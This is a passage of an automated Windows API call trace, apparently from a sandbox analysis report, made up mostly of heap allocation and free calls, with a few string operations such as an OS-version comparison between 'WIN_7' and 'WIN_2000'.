Size=0x8) returned 0x24b13c8 [0255.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0255.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0255.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0255.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0255.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0255.284] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0255.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0255.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0255.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0255.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0255.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0255.284] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0255.284] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0255.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0255.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0255.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.285] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0255.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0255.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0255.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0255.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0255.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0255.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.285] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0255.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0255.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0255.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0255.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0255.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0255.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0255.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0255.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0255.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0255.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0255.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0255.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0255.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.286] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0255.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0255.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0255.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0255.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0255.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0255.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0255.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0255.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0255.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0255.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0255.287] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0255.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0255.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0255.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0255.288] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0255.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0255.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fa8 [0255.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0255.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0255.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9de0 [0255.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0255.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0255.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0255.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0255.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0255.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0255.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0255.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0255.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0255.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0255.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0255.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0255.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0255.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0255.290] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0255.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0255.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0255.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0255.290] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0255.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0255.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0255.290] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0255.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0255.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0255.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0255.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0255.291] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0255.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0255.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0255.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0255.291] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0255.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0255.291] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0255.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0255.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0255.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0255.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0255.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0255.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0255.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0255.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0255.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0255.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0255.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0255.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0255.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0255.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0255.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0255.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.295] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0255.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0255.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0255.296] HeapFree (in: 